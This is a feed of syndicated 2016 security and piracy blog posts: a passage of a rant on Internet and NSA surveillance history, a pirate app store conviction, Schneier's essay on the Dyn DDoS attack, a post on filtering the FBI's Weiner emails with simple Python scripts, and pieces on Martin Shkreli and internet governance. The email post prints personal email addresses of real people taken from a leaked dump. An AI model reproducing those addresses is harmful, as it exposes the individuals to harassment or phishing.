No, the Internet was not created by the US military. Sure, the military contributed to the Internet, but the majority of contributions came from corporations, universities, and researchers. The left-wing claim that the government/military created the Internet involves highlighting their contributions while ignoring everyone else’s.

The Internet was not “monitored from day one”, because until the 1990s, it wasn’t even an important enough network to monitor. As late as 1993, the Internet was dwarfed in size and importance by numerous other computer networks – until the web took off that year, the Internet was considered a temporary research project. Those like Novak writing the history of the Internet are astonishingly ignorant of the competing networks of those years. They miss XNS, AppleTalk, GOSIP, SNA, Novel, DECnet, Bitnet, Uunet, Fidonet, X.25, Telenet, and all the other things that were really important during those years.

And, mass Internet surveillance did indeed come only after 9/11. The NSA’s focus before that was on signals and telephone lines, because that’s where all the information was.  When 9/11 happened, they were still trying to catch up to the recent growth of the Internet. Virtually everything Snowden documents came after 9/11. Sure, they had programs like FAIRVIEW that were originally created to get telephone information in the 1970s, but these programs only started delivering mass Internet information after 9/11. Sure, the NSA occasionally got emails before 9/11, but nothing like the enormous increase in collection afterwards.

What I’ve shown here is that Matt Novak is a fucking idiot. He gets basic facts wrong about how the Internet works. He doesn’t prove Snowden’s actually wrong by citing evidence, only that Snowden is wrong because he disagrees with what leftists like Novak believe to be right. All the actual evidence supports Snowden in this case.

It doesn’t mean we should avoid politics. Technology and politics are different things; it’s not either-or, and doing one has no impact on deciding to do the other. But if you are a Dakota Access Pipeline protester, use Signal now instead of unencrypted messaging or phone calls, rather than waiting for activists to pass legislation.

Pirate App Store Operator Convicted for Criminal Copyright Infringement

Post Syndicated from Ernesto original https://torrentfreak.com/pirate-app-store-operator-convicted-for-criminal-copyright-infringement-161119/

Assisted by police in France and the Netherlands, the FBI took down the “pirate” Android stores Appbucket, Applanet, and SnappzMarket during the summer of 2012.

The domain seizures were the first ever against “rogue” mobile app marketplaces and followed similar actions against BitTorrent and streaming sites.

During the years that followed, several people connected to the Android app sites were arrested and indicted. Most cases are still pending, but this week one of the operators of SnappzMarket was convicted.

The now 26-year-old Joshua Taylor, a resident of Kentwood, Michigan, was convicted of conspiracy to commit criminal copyright infringement during a bench trial this week.

Taylor’s attorney had filed a motion to dismiss the case, claiming that the indictment was inadequate and unclear, but U.S. District Judge Timothy Batten Sr. denied this request.

Instead, Taylor was found guilty and now awaits sentencing, scheduled to take place in February next year.

Taylor found guilty


The Department of Justice (DoJ) is pleased with the guilty verdict. They note that Taylor and his co-conspirators distributed more than a million apps without permission from the copyright holders, causing significant losses.

“The total retail value of the more than one million pirated apps distributed by the SnappzMarket Group was estimated to have been more than $1.7 million, according to evidence presented at previous court proceedings,” DoJ notes.

Two other co-conspirators, Jon Peterson and Gary Edwin Sharp II, previously pleaded guilty and will be sentenced at a later date as well. All three face up to several years in prison.

This summer, SnappzMarket’s ‘PR manager’ Scott Walton was the first of the group to receive his sentence: 46 months in prison for conspiracy to commit copyright infringement.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Lessons From the Dyn DDoS Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/11/lessons_from_th_5.html

A week ago Friday, someone took down numerous popular websites in a massive distributed denial-of-service (DDoS) attack against the domain name provider Dyn. DDoS attacks are neither new nor sophisticated. The attacker sends a massive amount of traffic, causing the victim’s system to slow to a crawl and eventually crash. There are more or less clever variants, but basically, it’s a datapipe-size battle between attacker and victim. If the defender has a larger capacity to receive and process data, he or she will win. If the attacker can throw more data than the victim can process, he or she will win.

The attacker can build a giant data cannon, but that’s expensive. It is much smarter to recruit millions of innocent computers on the internet. This is the “distributed” part of the DDoS attack, and pretty much how it’s worked for decades. Cybercriminals infect innocent computers around the internet and recruit them into a botnet. They then target that botnet against a single victim.

You can imagine how it might work in the real world. If I can trick tens of thousands of others to order pizzas to be delivered to your house at the same time, I can clog up your street and prevent any legitimate traffic from getting through. If I can trick many millions, I might be able to crush your house from the weight. That’s a DDoS attack: it’s simple brute force.

As you’d expect, DDoSers have various motives. The attacks started out as a way to show off, then quickly transitioned to a method of intimidation, or a way of just getting back at someone you didn’t like. More recently, they’ve become vehicles of protest. In 2013, the hacker group Anonymous petitioned the White House to recognize DDoS attacks as a legitimate form of protest. Criminals have used these attacks as a means of extortion, although one group found that just the fear of attack was enough. Military agencies are also thinking about DDoS as a tool in their cyberwar arsenals. A 2007 DDoS attack against Estonia was blamed on Russia and widely called an act of cyberwar.

The DDoS attack against Dyn two weeks ago was nothing new, but it illustrated several important trends in computer security.

These attack techniques are broadly available. Fully capable DDoS attack tools are available for free download. Criminal groups offer DDoS services for hire. The particular attack technique used against Dyn was first used a month earlier. It’s called Mirai, and since the source code was released four weeks ago, over a dozen botnets have incorporated the code.

The Dyn attacks were probably not originated by a government. The perpetrators were most likely hackers mad at Dyn for helping Brian Krebs identify, and the FBI arrest, two Israeli hackers who were running a DDoS-for-hire ring. Recently I have written about probing DDoS attacks against internet infrastructure companies that appear to be perpetrated by a nation-state. But, honestly, we don’t know for sure.

This is important. Software spreads capabilities. The smartest attacker needs to figure out the attack and write the software. After that, anyone can use it. There’s not even much of a difference between government and criminal attacks. In December 2014, there was a legitimate debate in the security community as to whether the massive attack against Sony had been perpetrated by a nation-state with a $20 billion military budget or a couple of guys in a basement somewhere. The internet is the only place where we can’t tell the difference. Everyone uses the same tools, the same techniques and the same tactics.

These attacks are getting larger. The Dyn DDoS attack set a record at 1.2 Tbps. The previous record holder was the attack against cybersecurity journalist Brian Krebs a month prior at 620 Gbps. This is much larger than required to knock the typical website offline. A year ago, it was unheard of. Now it occurs regularly.

The botnets attacking Dyn and Brian Krebs consisted largely of unsecure Internet of Things (IoT) devices: webcams, digital video recorders, routers and so on. This isn’t new, either. We’ve already seen internet-enabled refrigerators and TVs used in DDoS botnets. But again, the scale is bigger now. In 2014, the news was hundreds of thousands of IoT devices; the Dyn attack used millions. Analysts expect the IoT to increase the number of things on the internet by a factor of 10 or more. Expect these attacks to similarly increase.

The problem is that these IoT devices are unsecure and likely to remain that way. The economics of internet security don’t trickle down to the IoT. Commenting on the Krebs attack last month, I wrote:

The market can’t fix this because neither the buyer nor the seller cares. Think of all the CCTV cameras and DVRs used in the attack against Brian Krebs. The owners of those devices don’t care. Their devices were cheap to buy, they still work, and they don’t even know Brian. The sellers of those devices don’t care: They’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution because the insecurity is what economists call an externality: It’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

To be fair, one company that made some of the unsecure things used in these attacks recalled its unsecure webcams. But this is more of a publicity stunt than anything else. I would be surprised if the company got many devices back. We already know that the reputational damage from having your unsecure software made public isn’t large and doesn’t last. At this point, the market still largely rewards sacrificing security in favor of price and time-to-market.

DDoS prevention works best deep in the network, where the pipes are the largest and the capability to identify and block the attacks is the most evident. But the backbone providers have no incentive to do this. They don’t feel the pain when the attacks occur and they have no way of billing for the service when they provide it. So they let the attacks through and force the victims to defend themselves. In many ways, this is similar to the spam problem. It, too, is best dealt with in the backbone, but similar economics dump the problem onto the endpoints.

We’re unlikely to get any regulation forcing backbone companies to clean up either DDoS attacks or spam, just as we are unlikely to get any regulations forcing IoT manufacturers to make their systems secure. This is me again:

What this all means is that the IoT will remain insecure unless government steps in and fixes the problem. When we have market failures, government is the only solution. The government could impose security regulations on IoT manufacturers, forcing them to make their devices secure even though their customers don’t care. They could impose liabilities on manufacturers, allowing people like Brian Krebs to sue them. Any of these would raise the cost of insecurity and give companies incentives to spend money making their devices secure.

That leaves the victims to pay. This is where we are in much of computer security. Because the hardware, software and networks we use are so unsecure, we have to pay an entire industry to provide after-the-fact security.

There are solutions you can buy. Many companies offer DDoS protection, although they’re generally calibrated to the older, smaller attacks. We can safely assume that they’ll up their offerings, although the cost might be prohibitive for many users. Understand your risks. Buy mitigation if you need it, but understand its limitations. Know the attacks are possible and will succeed if large enough. And the attacks are getting larger all the time. Prepare for that.

This essay previously appeared on the SecurityIntelligence website.

Yes, the FBI can review 650,000 emails in 8 days

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/11/yes-fbi-can-review-650000-emails-in-8.html

In today’s news, Comey announces the FBI has reviewed all 650,000 emails found on Anthony Weiner’s computer and determined there’s nothing new. Some have questioned whether this could be done in 8 days. Of course it could be — those were 650,000 emails to Weiner, not Hillary.

Reading Weiner’s own emails, those unrelated to his wife Huma or Hillary, is unlikely to be productive. Therefore, the FBI is going to filter those 650,000 Weiner emails to get at those that were also sent to/from Hillary and Huma.

That’s easy for automated tools to do. Just search the From: and To: fields for email addresses known to be used by Hillary and associates. For example, search for hdr29@hrcoffice.com (Hillary’s current email address) and ha16@hillaryclinton.com (Huma Abedin’s current email).

Below is an example email header from the Podesta dump:

From: Jennifer Palmieri <jpalmieri@hillaryclinton.com>
Date: Sat, 2 May 2015 11:23:56 -0400
Message-ID: <-8018289478115811964@unknownmsgid>
Subject: WJC NBC interview
To: H <hdr29@hrcoffice.com>, John Podesta <john.podesta@gmail.com>,
Huma Abedin <ha16@hillaryclinton.com>, Robby Mook <re47@hillaryclinton.com>,
Kristina Schake <kschake@hillaryclinton.com>

This is likely to filter down the emails to a manageable few thousand.
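A header filter like this is a few lines of scripting. Here is a minimal sketch in Python — the address list and mbox layout are illustrative assumptions, not a description of the FBI's actual tooling:

```python
import mailbox

# Illustrative set of known addresses for Hillary and associates.
KNOWN_ADDRESSES = {"hdr29@hrcoffice.com", "ha16@hillaryclinton.com"}

def involves_known_address(msg):
    """True if any known address appears in the From:, To:, or Cc: headers."""
    headers = " ".join(msg.get(h, "") for h in ("From", "To", "Cc")).lower()
    return any(addr in headers for addr in KNOWN_ADDRESSES)

def filter_mbox(path):
    """Yield only the messages that involve a known address."""
    for msg in mailbox.mbox(path):
        if involves_known_address(msg):
            yield msg
```

Run over a mailbox dump, a filter of this shape discards every email that never touched a watched account, which is the bulk of the 650,000.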

Next, filter out the emails already in the FBI’s possession. The easiest way is using the Message-ID: header, a unique value generated for every email. If a Weiner email has the same Message-ID as an email already retrieved from Huma and Hillary, the FBI can ignore it.
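Deduplicating on Message-ID is just a set lookup. A hedged sketch along the same lines, assuming the IDs of already-reviewed emails have been exported to a set:

```python
def drop_already_reviewed(messages, reviewed_ids):
    """Skip any message whose Message-ID matches one already
    retrieved from the Huma/Hillary collections."""
    for msg in messages:
        mid = (msg.get("Message-ID") or "").strip()
        if mid and mid in reviewed_ids:
            continue  # duplicate of an email investigators already have
        yield msg
```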

This is likely to reduce the number of emails needing review to less than a thousand, or less than 100, or even all the way down to zero. And indeed, that’s what NBC News is reporting:

The point is this: computer geeks have tools that make searching emails extremely easy. Given those emails, a list of known email accounts for Hillary and her associates, and a list of other search terms, it would take me only a few hours to reduce the workload from 650,000 emails to a couple hundred, which a single person can read in less than a day.

The question isn’t whether the FBI could review all those emails in 8 days, but why the FBI couldn’t have reviewed them all in one or two days. Or even why they couldn’t have reviewed them before Comey made that horrendous announcement that they were reviewing the emails.

Martin Shkreli Begs For Private Torrent Site Invitation

Post Syndicated from Andy original https://torrentfreak.com/martin-shkreli-begs-for-private-torrent-site-invitation-161031/

Martin Shkreli is the founder and former CEO of Turing Pharmaceuticals, and wherever he appears, controversy is never far behind.

Last year the 33-year-old was subjected to massive criticism when Turing obtained a license to produce antiparasitic drug Daraprim and promptly boosted its price by more than 5,000%.

It was a move that saw him being branded in the media as the most hated man in America.

But it’s not just pharma that has built Shkreli’s reputation. With a reported net worth of between $45m and $100m, the entrepreneur’s flamboyant spending has also hit the headlines. A keen hip-hop fan, Shkreli was revealed in 2015 as the buyer of Once Upon a Time in Shaolin, a one-off album from Wu-Tang Clan.

With a price tag of a cool $2m, it’s clear that Shkreli doesn’t mind digging deep when it comes to spending money on exclusive music. However, it appears that the businessman might also have a penchant for getting music for free, when the circumstances are right.

Rising from the ashes of the defunct private tracker OiNK, What.cd is currently the most prestigious music torrent site on the Internet, bar none. The site has a largely hand-picked userbase who in turn are allowed to invite friends. Somehow, it appears that Shkreli managed to get on board.

Tweeting from Manhattan late Friday, Shkreli appeared to indicate that he was having trouble with his account on What.cd. This led him to start begging for an invitation to get back on the site.

Somewhat inevitably, people following him on Twitter decided this would be a good time to have some fun.

“Why don’t you use USE.net like a normal person Martin,” one asked, sarcastically referencing the Usenet system.

“Newsgroups?” Shkreli accurately responded. This guy clearly knows his piracy haunts.

As fans already know, What.cd prides itself on covering every musical genre in depth, while offering the rarest of rare releases. With that in mind, if only there was an individual with access to the rarest recording of all time who might upload that to What.cd in exchange for an invitation….

While Shkreli does some wild stuff, uploading Once Upon a Time in Shaolin to What.cd is probably going to be a step too far, even for him. However, he could do so if he wishes. He’s under investigation by the FBI but last year they revealed that they hadn’t seized the album.

Contractually, the album can’t be exploited commercially until 2103, but according to Wu-Tang, Shkreli could legally give it away for free.

“It can be exhibited publicly and it can be given away for free. But it cannot be commercialized as a conventional album release until 2103. Even then, it will be the owner’s decision to release it or keep it as a single unit, not the Wu-Tang,” the group said following the album’s sale.

However, there is a bigger problem. If you’ve ever had a What.cd account, you can’t have another. Those are the rules and not observing them can get both you and your inviter banned.

Shkreli’s only real option is to head off to the site’s IRC channels and ask for his account to be reinstated. If the disabling of the account was for a minor issue, it’s possible they’ll just re-enable it. He might also try the “do you know who I am” routine to get some leverage, although that might not go entirely to plan.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

How Different Stakeholders Frame Security

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/10/how_different_s.html

Josephine Wolff examines different Internet governance stakeholders and how they frame security debates.

Her conclusion:

The tensions that arise around issues of security among different groups of internet governance stakeholders speak to the many tangled notions of what online security is and whom it is meant to protect that are espoused by the participants in multistakeholder governance forums. What makes these debates significant and unique in the context of internet governance is not that the different stakeholders often disagree (indeed, that is a common occurrence), but rather that they disagree while all using the same vocabulary of security to support their respective stances. Government stakeholders advocate for limitations on WHOIS privacy/proxy services in order to aid law enforcement and protect their citizens from crime and fraud. Civil society stakeholders advocate against those limitations in order to aid activists and minorities and protect those online users from harassment. Both sides would claim that their position promotes a more secure internet and a more secure society — ­and in a sense, both would be right, except that each promotes a differently secure internet and society, protecting different classes of people and behaviour from different threats.

While vague notions of security may be sufficiently universally accepted as to appear in official documents and treaties, the specific details of individual decisions­ — such as the implementation of dotless domains, changes to the WHOIS database privacy policy, and proposals to grant government greater authority over how their internet traffic is routed­ — require stakeholders to disentangle the many different ideas embedded in that language. For the idea of security to truly foster cooperation and collaboration as a boundary object in internet governance circles, the participating stakeholders will have to more concretely agree on what their vision of a secure internet is and how it will balance the different ideas of security espoused by different groups. Alternatively, internet governance stakeholders may find it more useful to limit their discussions on security, as a whole, and try to force their discussions to focus on more specific threats and issues within that space as a means of preventing themselves from succumbing to a façade of agreement without grappling with the sources of disagreement that linger just below the surface.

The intersection of multistakeholder internet governance and definitional issues of security is striking because of the way that the multistakeholder model both reinforces and takes advantage of the ambiguity surrounding the idea of security explored in the security studies literature. That ambiguity is a crucial component of maintaining a functional multistakeholder model of governance because it lends itself well to high-level agreements and discussions, contributing to the sense of consensus building across stakeholders. At the same time, gathering those different stakeholders together to decide specific issues related to the internet and its infrastructure brings to a fore the vast variety of definitions of security they employ and forces them to engage in security-versus-security fights, with each trying to promote their own particular notion of security. Security has long been a contested concept, but rarely do these contestations play out as directly and dramatically as in the multistakeholder arena of internet governance, where all parties are able to face off on what really constitutes security in a digital world.

We certainly saw this in the “going dark” debate: e.g. the FBI vs. Apple and their iPhone security.